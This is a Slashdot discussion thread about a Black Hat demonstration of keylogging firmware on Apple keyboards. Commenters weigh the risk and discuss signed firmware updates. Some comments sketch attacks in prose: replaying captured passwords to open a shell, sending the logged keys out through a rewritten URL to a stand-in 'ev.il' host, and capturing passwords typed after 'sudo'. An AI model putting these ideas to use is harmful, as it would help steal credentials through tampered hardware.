Apple Keyboard Firmware Hack Demonstrated

Anonymouse writes with this excerpt from SemiAccurate: "Apple keyboards are vulnerable to a hack that puts keyloggers and malware directly into the device's firmware. This could be a serious problem, and now that the presentation and code (PDF) is out there, the bad guys will surely be exploiting it. The vulnerability was discovered by K. Chen, and he gave a talk on it at Black Hat this year (PDF). The concept is simple: a modern Apple keyboard has about 8K of flash memory, and 256 bytes of working RAM. For the intelligent, this is more than enough space to have a field day. ... The new firmware can do anything you want it to. Chen demonstrated code which, when you put in a password and hit return, starts playing back the last five characters typed in, LIFO. It is a rudimentary keylogger; a proof of concept more than anything else. Since there is about 1K of flash free in the keyboard itself, you can log quite a few keystrokes totally transparently."

Huh??

[nurb432]

Why does a keyboard even need flash in the first place? Being a keyboard isn't a complex job.

Re:Huh??

[anss123]

Why does a keyboard even need flash in the first place? Being a keyboard isn't a complex job.

Flash chips are cheap these days.

And what's to stop people from simply installing a tiny key logging chip inside your keyboard? Seems less trouble than writing a crummy firmware hacks, and it's not like I'd notice an extra chip inside my keyboard.

Re:Huh??

Modern peripherals have microcontrollers that are basically tiny computers all on one chip. The have program flash, data registers, and sometimes data flash or eeprom memory. They are basically small computers about a $1.00 a pop, and are generally more affordable than custom silicon for most low-speed applications (i.e. less than 20 MIPS).

Re:Huh??

[MaskedSlacker]

The need for physical access? Sure, someone intentionally spying on YOU might do it, but for someone looking to keylog as many credit card numbers as possible it'd be kinda difficult/pointless.

Re:Huh??

A keyboard these days is a big switch matrix make of conductive ink on mylar and a microcontroller to decode the keys and whatever protocol your host wants.

Like it or not, FLASH is what you get on microcontroller these days. Few if any of the devices are EPROM based anymore. By making the same part generic and programmable, you get huge volume and lower price.

Re:Huh??

[nurb432]

Ok, i should have clarified that i meant 'user writable' flash.

Re:Huh??

...microcontrollers that are basically tiny computers all on one chip.

You felt the need to explain what a microcontroller is on Slashsot? What next, you're going to explain how the computer does math in "binary" which are ones and zeros ?

Re:Huh??

[UltimApe]

yes, because the original question he was answering seemed equally ill-informed. If the original question needed to be asked, it'd be likely that they didn't know what a microcontroller was.

Re:Huh??

[ionix5891]

DRM... knowing Apple...

Re:Huh??

[Darkness404]

I'm assuming so it can be reprogrammed to change between the multiple keyboard layouts without much of a hardware change other than changing the keycaps.

Re:Huh??

[ettlz]

Probably unimplemented DRM. By forming a secure input path, it furnishes printed material content protection --- by stopping you from typing it in.

Re:Huh??

What next, you're going to explain how the computer does math in "binary" which are ones and zeros ?

Damn it, all this time I was thinking it used 0-9 like everyone else does.

Re:Huh??

[Brian+Gordon]

You guys need to go back to elementary school. Everyone does math with 1-10.

Re:Huh??

[anss123]

The need for physical access?

You need physical access for flashing the keyboard, unless you have taken over the mac's os. In the later case you can install a key logger in the OS, so why bother with the keyboard. Also you need to get the keydata somehow out of the keyboard so without OS control you have to straddle over and collect it yourself.

Hey, why are you connecting you laptop to my keyboard....

Point is, this security vulnerability is no big deal.

Re:Huh??

[Jeremy+Erwin]

Damn it, all this time I was thinking it used 0-9 like everyone else does.

You're probably thinking of ENIAC

Re:Huh??

[beelsebob]

Why on earth would you do that in the hardware level? The keyboard just sends key codes, not characters to the OS, it's the OS's job to map them onto characters.

Re:Huh??

[MMC+Monster]

If these are recent (last 2-3 year) keyboards, the ones I have double as non-powered USB hubs.

The idea is that you plug in your mouse and Watcom tablet or other input device directly into the keyboard instead of snaking a couple extra wires to the computer.

Pretty nifty (until now, that is).

Re:Huh??

[nedlohs]

I'm pretty sure it's easier for me to get some code to run on your machine than it is for me to break into your house and install a logger inside your keyboard.

Re:Huh??

[anss123]

I'm pretty sure it's easier for me to get some code to run on your machine than it is for me to break into your house and install a logger inside your keyboard.

If you can break into my machine, install a flash based key logger and have that transmit data over the internet back to you then you could have saved yourself the problem of using a flash based key logger - as you obviously have control of the OS and can keylogg far more than one-thousand keystrokes.

Re:Huh??

Unless the firmware was hacked before you received your new keyboard...

Re:Huh??

[nedlohs]

But if you removed the logger, say by reinstalling the OS or whatever I would lose that. With it in the keyboard I you need to also replace that (or reflash it of course).

Re:Huh??

[anss123]

Unless the firmware was hacked before you received your new keyboard...

Which still leaves you the problem of retriving the data.

Re:Huh??

[mattventura]

The only possible reason I could think for someone doing this is because it would work cross-OS, and even on boot sequences before a normal keylogger would be activated, so you could do this to steal a disk encryption password.
You could use it constructively, though. You could block the key sequences used to boot off a CD or external drive, which could actually be a useful feature for corporations or schools wanting to prevent booting from external media, since the other methods to prevent that don't work that well.

Re:Huh??

Because this tool just sends messages to a HID device, AFAIK, it can be run as any user, admin or otherwise. Want the root password on somebody's Mac OS X box? All you need is a shell account.

Re:Huh??

[RoFLKOPTr]

Any security vulnerability like this is a big deal... ESPECIALLY when security is one of the primary things that Apple advertises about its OS and hardware. What's to stop the compromised keyboard from sending the keylogged data to an FTP server like just about every other trojan on the planet? Also, a virus scanner could easily remove a trojan from the OS, while finding it in the keyboard's firmware would be a somewhat more difficult task.

Re:Huh??

[anss123]

The only possible reason I could think for someone doing this is because it would work cross-OS, and even on boot sequences before a normal keylogger would be activated, so you could do this to steal a disk encryption password.

That is a good point, but only for attacking those dual booters and disk encrypters (the lather perhaps being the most useful as you could then steal the disk and get the data - assuming you can't copy it to a USB stick or download it over the nett for some reason.)

You could use it constructively

You could be onto something there, but there's probably programmable keyboards better suited for this already :-)

Re:Huh??

[anss123]

Because this tool just sends messages to a HID device, AFAIK, it can be run as any user, admin or otherwise. Want the root password on somebody's Mac OS X box? All you need is a shell account.

Hmm, didn't realize you could do this from user mode. That's more serious, yes. You still need a "shell account" though. Most people don't hand those out.

Re:Huh??

[anss123]

What's to stop the compromised keyboard from sending the keylogged data to an FTP server like just about every other trojan on the planet?

A compromised keyboard does not automatically have admin access to the OS. Though it might be possible to get your admin password through guessing it's the first thing you write after boot and then moving on from there.

Re:Huh??

[Shamenaught]

Absolutely, but most non slash-dotters just count from 2-9 between 1 and 10. Slash dotters have more options, however, Sometimes they'll not count at-all between 1 and 10, and sometimes they'll count from 2-F instead.

Reminds me of an old joke:
There are only 10 types of people in this world, those who understand binary, and those who don't.

Re:Huh??

[Shamenaught]

How is this comment trolling? The prospect that they could make a keyboard that wouldn't work with a non-mac keyboard was something I considered when I saw this article. I mean, there was the story a few weeks ago where palm pre's firmware was emulating apple hardware and apple was getting its knickers in a twist. Having some provision in future hardware that makes apple hardware only work with apple hardware strikes me as a logical extension.

Re:Huh??

[Eternauta3k]

Like it or not, FLASH is what you get on microcontroller these days. Few if any of the devices are EPROM based anymore. By making the same part generic and programmable, you get huge volume and lower price

Flash? EPROM? Don't they just order a couple million masked chips?

Re:Huh??

[aztracker1]

More likely so that the same hardware can be used for multiple languages & key templates. Not to mention such a thing could be useful for gaming keyboards.

Re:Huh??

[CarpetShark]

Being a keyboard isn't a complex job.

Apple keyboards are also USB hubs. I prefer my USB devices to be flash upgradeable, especially if they're hubs or will be around for a long time (like a keyboard) or something like that.

Also... keyboards SHOULD be complex. They're the primary input method, and they're inputting codes that get mapped to something very complex: unicode. If I want my keypad-minus to enter a chinese ideograph, even at a unicode console when the GUI hasn't come up (say, because I have a unicode filename with the solution in there) then it should be able to do that.

Re:Huh??

[RalphSleigh]

No, it's your OS's job to decide what pressing keypad-minus does, the keyboard should simply tell the OS that keypad-minus key was pressed

Re:Huh??

I just replied to your blog. This is what I wrote.

It seems that the example I typed up broke. I meant:

do
    x <- MonadInstance a
    y <- MonadInstance b
    return (x + y)

is equivalent to

MonadInstance a >>= ( \x -> (MonadInstance b >>= ( \y -> ( return x + y )))

If this code runs at all, the function bindings force the order of evaluation.

Even if the runtime is making promises (thunks in Haskell-speak), it is going to have have to unroll those promises and compute x before it can compute f x in a computation (A x) >>= f. There's just no way around that. If an operation is going to occur at all, laziness can't change the order in which its sub-operations occur. It merely means that the runtime performs computations on demand.

Beta reduction is what allows different computational orders, depending on the functional argument dependency tree. For example, in the computation f (g x) (h y), (g x) or (h y) can be computed first, but they BOTH have to be computed before f (g x) (h y) (the whole thing).

But the whole point of a monad is that the monadic combinators bind the output of one computation to the input of a one argument function. There is no ambiguity about the order of f $ g $ h $ i $ k, and laziness will not change the order in which these functions are called. k goes first. The monadic combinators have semantics similar to the application operator $.

http://en.wikipedia.org/wiki/Beta_reduction

Also note the Control.Monad documentation (http://www.haskell.org/ghc/docs/latest/html/libraries/base/Control-Monad.html#v%3A%3E%3E%3D), which describes the semantics of >>= and >> as:

(>>=) Sequentially compose two actions, passing any value produced by the first as an argument to the second.

(>>) Sequentially compose two actions, discarding any value produced by the first, like sequencing operators (such as the semicolon) in imperative languages.

Laziness does not change the order in which operations occur. Beta-reduction (what the Haskell literature calls "non-strict reduction" or "evaluation") is what does that. These are related but NOT synonymous. You can have an eager, non-strict language. Or lazy and strict semantics. A web server like Apache is lazy and potentially strict as a computational system, since it lazily dispatches requests to a runtime of your choice.

http://www.haskell.org/haskellwiki/Lazy_vs._non-strict

Re:Huh??

[RoFLKOPTr]

A compromised keyboard does not automatically have admin access to the OS.

I didn't say it would have access to the OS? When was that ever brought up? A compromised keyboard has access to everything you type, so it will have access to all your computer account passwords (because software won't need to be running before login because it will be hardcoded into your keyboard), your bank account and PayPal passwords (because none of them allow your browser to store it), your chats with young children online... everything. That can be considered even worse than having admin access to the OS, because wipe your hard drive to get rid of it as many times as you want and it will still be there.

Re:Huh??

Just add a piece of paper to the box:

"Congratulations on your purchase of a new mac! You're probably a former windows user looking to escape from daily crashes and insecure applications, so please take a moment to read these instructions and familiarize yourself with your new mac's security features!

One new feature we have added is extra encryption for your bank and credit card webpages. To activate this encryption, please visit each of your banks and credit card's websites (be sure to type the URL, do not click on any links in your emails as hackers can send you fake links that look real) and log in.

After logging in to each of these websites, visit our enhanced encryption website at http://bankencrypter.com/ You will be asked to type an easy-to-read captcha (an image designed to prove that you're human, rather than a hacker). Once you have done so, the encryption process for that site will be complete and you will be extra secure!

Note: While our encryption is designed for bank accounts and credit card websites, you can use it for your e-mail as well. Just follow the steps above to enable extra security to your webmail account!"

Re:Huh??

[anss123]

I didn't say it would have access to the OS?

Without access to the OS the keyboard will not be able to send the data anywhere.

Re:Huh??

[prockcore]

Ah but the keyboard needs to understand how keycodes change for Shift/Ctrl/AltGR/etc.

Re:Huh??

Right. "Hey, why are you connecting your laptop to my keyboard....". That's exactly what anyone looking at the situation would ask.

And not, oh, say, "why do you need to connect my keyboard to your laptop". No, can't think of any possible excuse that would justify that particular scenario, not even having just spilled coffee on the laptop's keyboard or for other reasons having the keys flake out even though I need to write something urgent and the laptop takes USB keyboards just fine.

In other words: learn to think..

"Why are you connecting your laptop to my keyboard...", my god.

Re:Huh??

[Ihmhi]

They did this on The Real Hustle: switched a keyboard in an office with an identical keyboard that had a keylogging chip added in. It was quite interesting.

Re:Huh??

[Tacvek]

Keyboards with built-in hubs have been around nearly as long as as USB keyboards. The idea would be that you plug your mouse, and perhaps your joystick into the keyboard, using only one USB port on the computer for all your major input devices. These days, a hub built into the keyboard is often the most convenient USB port for flash drives.

Similarly, it was thought that your monitor might be a USB device (Not fully USB, still using a VGA or DVI cable for the video image, but perhaps passing monitor configuration data (brightness, contrast, ect) as well as power management data.) The monitor would also be a USB hub, into which your speakers and microphone were connected.

Thus all your essential components took up only 2 of your computer's USB ports, leaving the rest for other devices (such as printers or scanners, or mp3 players, or whatnot).

Re:Huh??

[adolf]

Mac user: "What's a shell account?"

Linux user explains the whole thing.

Mac user: *head explodes*

Re:Huh??

[hey!]

Oh, it's no big deal now, but if the keyboards get a little more powerful it isn't hard to think of ways of exploiting them.

One obvious advantage to infecting a keyboard is conventional methods for dealing with malware aren't going to detect the infection. It has a lot of the same advantages as a BIOS virus.

One could conceivably infect a whole shipment of keyboards headed for a company of industrial espionage purposes. Resources are currently pretty slim for doing much more, but if we imagine keyboards getting a little more powerful, then it won't be necessary to get physical access to the keyboard. The keyboard could be programmed to log in to the computer at 3AM (using your password) and fire up a command line to send the password to some Internet site.

This kind of a wake-up call. Sooner or later somebody will dream up a reason to make keyboards smart enough to be a problem; we can see Apple has already taken the first steps down that road, although we appear to be far from the point where it is a practical concern.

Re:Huh??

[MrHanky]

It's amazing what bullshit you Mac fanboys will spew out to defend Apple's shortcomings.

Re:Huh??

[ChunderDownunder]

The potential being that a user can change the keyboard to, say, "US English" or "International" without requiring the OS to explicitly support it?

Then one could plug a keyboard into OS X, XP, Gnome, Haiku etc and not have to mess around configuring the settings each time. Which in shared households would mean 'Gary' just plugs in his $5 US English keyboard set to international with all the weird symbols to do his Spanish/German homework and the rest of the family use their own and don't have to reset the keyboard layout if he forgets. Short of buying an international keyboard, the keyboard itself could remember which layout it's using, independent of the computer or OS. (Maybe they can already, I'm just thinking aloud!)

Re:Huh??

[x2A]

"so it will have access to all your computer account passwords"

Big deal.

"your bank account and PayPal passwords"

So what?

"your chats with young children online"

*falls off chair* f#&k me I'm burning this thing!

Re:Huh??

Imagine a replay attack. I'll describe a Linux variant. The main trick would be running some long-term pattern recognition to infer things like passwords, e.g. noticing the common sequence first typed after long delays, to login or unlock a screen saver. Then, longer delays still to notice idle periods when the user seems to be away (having access to wall clock time might be helpful for this hack), since you do not want an audience for your replay attack on the login facility.

When the user is perhaps not watching, start playing out some key presses to switch virtual consoles, login, and execute some shell commands. Or on a graphical system, if there is a common hotkey sequence to launch a terminal program, do that and get the same effect.

The best use might be to have the keyboard "hack" the system and bootstrap some larger malware by first getting a tiny agent in via the shell. This little agent needs to be able to determine when the system is networked, and then can download more complex malware. It also needs to be able to hide itself. Unlocking an existing session and using it would be one way to reduce the footprint of log messages, compared to starting a new session on a virtual console.

This is so freaking scary and obvious to me, it makes me realize that paranoid people should be using multi-factor authentication to their systems to prevent replay attacks like this.

Re:Huh??

Oooh, lemme write that one down, never heard that before...

Re:Huh??

[Divebus]

So the security fix is to run the palm of your hand around the keyboard a few times before you leave. At least 1k worth.

Re:Huh??

[AHuxley]

Its Apple, nobody else is going to take the $ and time to make it work right.
To talk to the OS, apps, hardware ect. Also Apple had to issue a fix for the physical type flow so it felt like a keyboard and not a broken keyboard.
So thats Apples side - they needed to be able to update, fix and reach in deep.
As to why it feels open and useful to malware could be generational?
Too few developers, so much work, keep the keyboard code simple and useful for later OS idea?

Re:Huh??

[petermgreen]

Dealing with USB however is something that requires a reasonablly powerfull microcontroller with quite complex firmware. Most current microcontrollers are flash based and in many cases are likely to have more flash than the application needs.

Re:Huh??

[adolf]

Wow. The mods sure do have a peculiar sense of humor when it comes to anything Apple.

This saddens me.

Re:Huh??

[GigaplexNZ]

You could block the key sequences used to boot off a CD or external drive, which could actually be a useful feature for corporations or schools wanting to prevent booting from external media, since the other methods to prevent that don't work that well.

BIOS passwords are rather effective, actually.

Re:Huh??

DRM... knowing Apple...

You don't know Apple.

Re:Huh??

[beelsebob]

No it doesn't, the keyboard needs to send "key 185 down" when the user presses shift, and "key 185 up" when they release it (note making up the code).

It's the OSes job to determine how that modifies translation from keycode to character.

Re:Huh??

I'm pretty sure it's easier for me to get some code to run on your machine than it is for me to break into your house and install a logger inside your keyboard.

go for it. i'm waiting...

Re:Huh??

[tyrione]

It's amazing what bullshit you Mac fanboys will spew out to defend Apple's shortcomings.

What's amazing is you being a complete douche by flaming someone who a few comments later is vindicated, more formally, with actual facts on the point of this flash. Keep being a dick and thinking Linux invented shells, so on and so forth. I prefer knowing multiple operating systems, how kernels inter-operate with I/O devices and more as progress continues. Then again, there is a growing hard on group of "security experts" who make the Bush administration seem sane by their doomsday scenarios they present.

Re:Huh??

[MrHanky]

"Vindicated"? Everything he says from "Also..." on is bullshit. The keyboard outputs a keycode, the OS decides what to do with it, like turning it into a unicode character. A keyboard doesn't know what character it will put on the screen.

I'm not sure what the point of your comment is, since the only "actual fact" in it is that I flamed a guy: so what. And you have the nerve to mention the phrase "actual facts", just before veering into the most retarded straman attack I've seen this century. It makes you come across as a total moron, not as someone "knowing multiple operating systems, how kernels inter-operate with I/O devices and more". Which you most likely don't.

Re:Huh??

As opposed to simply plugging in a different keyboard? A flexible/fold-able keyboard sets you back about $5.

Re:Huh??

[MrMacman2u]

Illogical extension actually. All Apple would have needed to do to prevent their keyboards and mice from working with anything other than Apple Hardware is write a custom driver and create a custom firmware. Bam, done.

I know this may sound like a hassle to you or I, but to a hardware/software company like Apple? No prob.

But they haven't and in fact have been issuing stock standard HID compliant keyboards and mice for nearly a decade now.

Perhaps they got these controllers on the cheap, cheaper than pre-printed deals. Perhaps they are planning on making a more flexible keyboard, or expanding the functionality of future keyboards tht would require the use of a microcontroller.

No one except Apple knows for sure. ionix's comment was trolling, if only lightly so.

Re:Huh??

[vcompiler]

And what's to stop people from simply installing a tiny key logging chip inside your keyboard?

Now they know the cost. From now on, designers must be aware of the support cost incurred by install every individual piece of unnecessary chip.

Re:Huh??

[FridgeFreezer]

Because a universal microcontroller (such as Freescale s08 series) is cheaper than a dedicated keyboard chip.

Re:Huh??

[Shamenaught]

Hmm? Your suggested method to stop apple keyboards and mice working with other systems requires a custom firmware, which would either require flash memory on the keyboard or a hardware redesign. Would it really be more of an effort to put a little check in the keyboard firmware than it would to rewrite both firmware and drivers? I'm not saying this is something Apple are likely to do, but it strikes me your suggestion is less logical than mine.

I personally am of the opinion that it was just cheaper to bulk-buy general chips than to get some custom-made, but that doesn't mean the considered scenario hadn't crossed my mind. Can you really say it hadn't crossed ionix's mind either.

See, apple has this reputation for locking stuff so that apple only works with apple. They have software that only syncs with their hardware devices, proprietary disk image formats, and so on. I don't consider the suggestion that something else they're doing might be following the same path to be controversial, inflammatory, irrelevant or off-topic.

Of course the exception to this is Mac Fanboys. For fanboys, linking apple to anything bad is inflammatory, even when it's completely true that apple have done it. In this case, I suspect whoever modded ionix's comment was an apple fanboy, and as such not of sound mind.

Heck, I'm even contemplating a mac laptop as my next computer purchase. Ridiculously blinkard fanboys who can't stand to see even the deserved tarnishes to the mac brand, however, make me want to distance myself from macs altogether.

Re:Huh??

[Sjefsmurf]

who on earth wants to break into your house anyway? Now... some hacked keyboards at NSA, whitehouse or pentagon which can snoop interesting stuff without any traceable changes to OS or the HW except some codelines in the firmware, then we are talking. Serviceman comes in one day, replace keyboard with a hacked unit. Finds an excuse to come back a bit later to pick it up again including data.

Re:Huh??

[AmiMoJo]

The reason is because they use cheap Cypress microcontrollers, and the flash memory/RAM is just a standard feature of them. You can disable re-programming and prevent reading the flash memory, but apparently Apple didn't.

Unfortunately firmware updates seem to be becoming more common. Even my Samsung TV has them.

Re:Huh??

[AmiMoJo]

Yes, but it's easier for my anti-virus software to detect something installed on my PC. It would be virtually impossible to detect a hardware based keylogger, especially one which is built into the keyboard and can't be seen sticking out the back of the machine.

Re:Huh??

[AmiMoJo]

Actually, sub £1 Atmel AVRs can do USB in firmware (google V-USB), or you can get sub £1 versions with a USB controller built in.

What worries me is that Apple seem to be taking the ability to update firmware as a license to release products before they are fully tested. I mean, it's a keyboard and it has firmware updates. How much of an epic fail do you have to have when you can't even design a keyboard, by far the most common computer peripheral, that just works. Even the cheapest keyboards work fine, and this is supposed to be an Apple premium product.

Re:Huh??

[cicuz]

Isn't removing the motherboard's battery for a couple of minutes rather effective also?

Re:Huh??

[GigaplexNZ]

Only if the password is stored in volatile memory, which isn't always the case. And if one has physical access to the hardware to reset the password, they also have physical access to reflash the firmware to remove the block.

Re:Huh??

[ivan256]

Um, no. You can't do it from user mode. The technique described uses a debugger to attach to the firmware updater with a breakpoint after the privilege escalation.

Re:Huh??

[xouumalperxe]

In the later case you can install a key logger in the OS, so why bother with the keyboard

Because, if you detect that the OS was compromised, you're reasonably likely to scour it. But nobody expects a hacked keyboard.

Re:Huh??

[gumbi+west]

here is a question: if the computer has shell accounts for untrusted users, what admin is using a kb attached to that machine when users can log in?

Re:Huh??

[Lars+T.]

BIOS passwords are rather effective, actually.

Not so much if somebody put a keylogger in your keyboard.

Re:Huh??

[GigaplexNZ]

And if they are capable of flashing the firmware on the keyboard to hijack the BIOS password (which only works if someone has entered the correct BIOS password recently, which doesn't happen often) they are capable of flashing the firmware on the keyboard to remove the key sequence blocker.

Re:Huh??

[mikiN]

haa, just wait until the user types something like:

persiankitty.com

then the keyboard quickly expands this to something like:

persiankitty.com.ev.il/s=[url encoded keylog buffer]

in the blink of an eye.

Simply make ev.il be on a really fast server that immediately redirects the user to persiankitty.com so as not to notice anything... (sorry Israelis, don't want to make you look bad (well, except maybe the Mossad, cough...), except ev.il's a convenient suffix)

Re:Huh??

[mikiN]

addendum: ...the user types something like:

persiankitty.com

[and hits the Enter key]

then the keyboard quickly expands this... ...and adds back the Enter key at the end.

Re:Huh??

[iamacat]

Since when is Apple a proponent of DRM? They kept it on music just until the labels relented.

Re:Huh??

Why exactly would a USB hub or keyboard need a firmware upgrade. The USB spec ain't changing. Yes, there'll be a new version of USB out soon, but you'll need new hardware to take advantage of it anyway.

Flash memory in a keyboard?

[lorenlal]

Pardon my ignorance. I have a lot of it. What is the advantage of having flash memory in a keyboard? I remember that the keyboard (at least at one time, I don't know if that's still the case) used an interrupt call to process input... But the load the keyboard placed on system resources should be so low, that there wouldn't be a need to offload that right? I have to be missing something here. It seems to me that by having something like this, you're just begging for trouble since it opens another attack surface. Anywhere you have processing and memory is a place for malware to reside. This doesn't impress me much Apple.

Re:Flash memory in a keyboard?

[TheRaven64]

It's a USB keyboard. That means that it communicates with the host via quite a complex protocol. A keyboard is not just a 'send a specific 8-bit signal when each button is pressed or released' device anymore. The amount of logic needed is not very large, but it's a lot more than a PS/2-style keyboard needed. The firmware could have been in ROM, but these days Flash is about as cheap as ROM and gives you the option of distributing fixes if you find bugs after the device ships.

Re:Flash memory in a keyboard?

[Wingman+5]

The main disadvantage to current keyboards that I see is that they only allow 3-6 concurrent key presses. That may not be a issue when typing frequently but if you modify the keyboard to be the capture source for a MAME cabinet that can be a issue. Perhaps the ram and firmware is to get around this issue.

Re:Flash memory in a keyboard?

[unfunk]

I'm curious too. I'd be surprised if my Logitech G15 keyboard had read/write memory (all the programs for it run on the OS), so just why the hell does Apple feel the need to make a keyboard with that?

Re:Flash memory in a keyboard?

I wouldn't be surprised. Modern gaming devices with programmable buttons often store those macros on the device itself, (e.g. the N52te) in order to allow it to work on any computer it's plugged into without needing the extra software - all you need the software for is to program it.

Re:Flash memory in a keyboard?

[TJamieson]

+5 Informative. In fact, the laptop keyboards also have a bit of flash, and Apple has updated a whole host of keyboard firmware over time.

Re:Flash memory in a keyboard?

[mlts]

If it has to have a flash BIOS for some reason, why does the flashing utility allow any image to go in without notice? Something like this should either require a signed or encrypted image that the flash utility decodes and decides is correct before putting it in. Maybe something simple as holding a distinct key sequence down on the keyboard while the utility pops up might be an alternative. This way at least the user has to be duped into knowingly flashing the keyboard, as opposed to a completely stealth compromise.

If I were making a keyboard with a flashable BIOS, rather than going the easy route and hiding a symmetric key on the chip would be eventually discovered, I'd use a SHA256 hash combined with an elliptic signing key to validate that a BIOS image was not tampered with before allowing it to be copied to the device. Yes, (barring someone breaking the public key crypto or obtaining the private key) someone could hack a particular keyboard to accept any flash image, but it would require physical access to the JTAG contacts on the device, and its well known that the game is over when an attacker obtains physical access to a machine anyway.

Re:Flash memory in a keyboard?

[confidential]

The firmware could have been in ROM, but these days Flash is about as cheap as ROM and gives you the option of distributing fixes if you find bugs after the device ships.

Two such examples of exactly that:

1. Aluminum Keyboard Firmware Update (desktops)
2. MacBook, MacBook Pro Keyboard Firmware Update (portables)

The only news here is that the same mechanism of installing these updates is able to have other third party software installed in their place as well.

Re:Flash memory in a keyboard?

[TheRaven64]

Asking a question that another poster answered two posts up and five minutes earlier is a good way to get a -1 redundant moderation.

Re:Flash memory in a keyboard?

[mysidia]

Such a switch would cost money. But it's a fricken keyboard, it's got lots of buttons.

Seems like there could be a special sequence of keys you have to press and hold for 30 seconds before the existing firmware would accept the request to initiate an update.

Re:Flash memory in a keyboard?

[mysidia]

Maybe in future versions of MacOS there will be new keyboard features, or a simpler/different keyboard communications protocol, and a firmware update will allow you to keep using your existing KB, instead of throwing it away and buying a brand new next-edition KB?

Re:Flash memory in a keyboard?

[ColdWetDog]

Yeah, he should wait 24 hours and repost the whole article. That works way better around here.

Re:Flash memory in a keyboard?

[Plunky]

It's a USB keyboard. That means that it communicates with the host via quite a complex protocol.

I wonder how different the Bluetooth keyboards are? I have an older one and I've never heard about this HIDFirmwareUpdaterTool, be interesting to see if I could hack my Bluetooth keyboard..

(I'm not likely to be vulnerable to a remote attack with this as I use a different OS and to my certain knowledge there is no way to initiate a firmware update from the host)

Re:Flash memory in a keyboard?

[TheRaven64]

That only works if you call yourself an 'editor'.

Re:Flash memory in a keyboard?

[TheRaven64]

Bluetooth is even more complicated, so I wouldn't be surprised if there's more RAM and flash in your keyboard. Not sure how the updates are handled, but they may be something simple like using the Bluetooth serial profile, in which case you'd be vulnerable to attach via any OS (although the attacker would have to already have root access). This attack is only really useful if you want to preserve a compromise past a reinstall. You'd probably get the keyboard to recognise the sequence "root\n" and "su\n" and then log the next dozen or so keystrokes, so you'd have the root password. Alternatively do the same thing with sudo, then you may get the password of a user in the sudoes file - if ssh is enabled you can then use this to get remote access. Convenient if you have physical access a few times for short periods (just long enough to install the firmware and then retrieve the password).

Re:Flash memory in a keyboard?

[ironicsky]

Most likely because they never anticipating anyone being bored enough to reverse engineer something as simple as a keyboard to hack it. Its like reverse engineering your old school ball mouse.

Some people just have alot of time on their hands

Re:Flash memory in a keyboard?

[ps60k]

In addition to being a USB keyboard, it also acts as a USB hub. All Apple USB keyboards have at least two built-in USB ports for mice, etc. I would imagine it requires a little more "logic" than a typical USB keyboard.

Re:Flash memory in a keyboard?

Your Logitech G15 is a USB keyboard that also acts as a hub, has programmable macro keys that don't go through the OS and evidently has upgradeable firmware and you'd be surprised if it had flash/EPROM? Most gaming mice have upgradeable firmware!

Christ, learn WTF you're talking about before you flap your jaw.

Re:Flash memory in a keyboard?

[dgatwood]

It depends on how the keyboard is matrixed, I suppose, but you have to have more than three-key handling or you wouldn't be able to detect people holding down the four or five modifier keys and pressing a key... not to mention that you'd have certain combinations of single modifiers with single keys that couldn't be detected at all.... :-)

With any keyboard encoder, you should be able to get at least 8 buttons or so even without any sharing or reprogramming. If you matrix the joystick in an interesting way to rule out absurd combinations (you can't push the stick up and down at the same time, for example), you can probably go even higher. How many controls do you need?

Re:Flash memory in a keyboard?

One computer I used to use had a HD6301V1 microcontroller in the keyboard. 4kB ROM, 128 bytes RAM, etc. - specs vaguely comparable to this Apple keyboard.

The computer? A SODDING ATARI ST FROM 1986. Microcontrollers in keyboards aren't new, and I suspect the main reason it didn't have flash memory instead of a ROM was because flash wasn't even commercially available back then.

(I seem to recall one virus checker peering at the keyboard's RAM, in the off-chance that something unwanted was lurking in there. There is nothing new under the sun...)

Re:Flash memory in a keyboard?

[jpmorgan]

And your keyboard would cost $200...

Re:Flash memory in a keyboard?

[Perf]

Advantages of flash...

Single chip solution - the microcontroller has flash built into it. The chip makers are using flash for microcontrollers because they only need to design one set of masks. FWIW, a chip rep once told me that the combination of voltage and reduced feature size means the older technologies wont work.

Re:Flash memory in a keyboard?

[bertoelcon]

Maybe in future versions of MacOS there will be new keyboard features, or a simpler/different keyboard communications protocol, and a firmware update will allow you to keep using your existing KB, instead of throwing it away and buying a brand new next-edition KB?

Are we thinking of the same Apple? They always want you to buy the new shiny, not upgrade the old one.

Re:Flash memory in a keyboard?

[headbulb]

This hack could be done to any usb keyboard.

A firmware flashing utility that refused to flash if the firmware image isn't from the manufactor would be annoying. There are usefull firmwares that are hacked. Dvd firmware that removes regions comes to mind.

While a bios is a firmware. A firmware is not a bios.

This hack also requires physical access, which means there are other ways to compromise the system.

Re:Flash memory in a keyboard?

[TyFoN]

Actually, Das Keyboard http://www.daskeyboard.com/ supports 12 keys to be pressed simultaneously :)

Re:Flash memory in a keyboard?

[unfunk]

all those macros are lost once the power is turned off. The only way to save them is to enter them into the driver software in the OS. This indicated to me that any RAM onboard is not flash. I did think before I posted.

Re:Flash memory in a keyboard?

Very true. However, there are a ton of Apple keyboards with a standard method of flashing them. Other parties might have this functionality, but the time/payoff isn't as much as it would be with one of the most used brands of keyboards out today.

Looks like the cheapest way for a company to guard this avenue of attack is to have an obvious key combination held down by the user before access to the flash utility is granted. Of course, a good Trojan would try to convince the user that they would get some DRM bypass mode if they did the key sequence + running the bongoed executable, but at least in this case, it forces it to be a PEBCAK issue as opposed to something compromised without any user knowledge.

Re:Flash memory in a keyboard?

[mikiN]

...and periodically sends its cachehold of data to the remnants of the Third Reich in hiding?

/me dives

Re:Flash memory in a keyboard?

[mikiN]

Its like reverse engineering your old school ball mouse.

I think there must be at least one coke pusher out there who has considered that option. Anyone like to have a mouseball?

What's next?

[psYchotic87]

Laptop charger hack demonstrated?
This is getting quite silly... Perhaps manufacturers should try to keep simple devices actually simple.

Re:What's next?

[unfunk]

I feel somewhat obliged to point out that the Sony PSP is vulnerable to a battery hack. If you put in a certain battery, you can then downgrade the system's firmware and play pirated games etc

Re:What's next?

[MaskedSlacker]

That's a feature, not a bug.

Re:What's next?

[oDDmON+oUT]

Perhaps manufacturers should try to keep simple devices actually simple.

When most major appliances, all automobiles, motorcycles, HDTVs, etc., etc., have a least one (if not dozens) of microprocessors and storage chips onboard, the time for that sentiment was long past in the last century.

We've sold our souls for convenience and "ease of use" features, and are now beginning to reap the dark side of those value adds.

Re:What's next?

[kerohazel]

"The more they overthink the plumbing, the easier it is to stop up the drain."

Yes, but does it run...

[TheRaven64]

...Contiki?

Re:Yes, but does it run...

[Perf]

Imagine a whole raft of Contiki computers...

Re:Yes, but does it run...

+1 Genius

FINALLY!

A first port for the Mac!

Coming soon to an enterprise near you

[SuperKendall]

Mandatory 2k long passwords to defeat possible hardware loggers.

Changed monthly, of course.

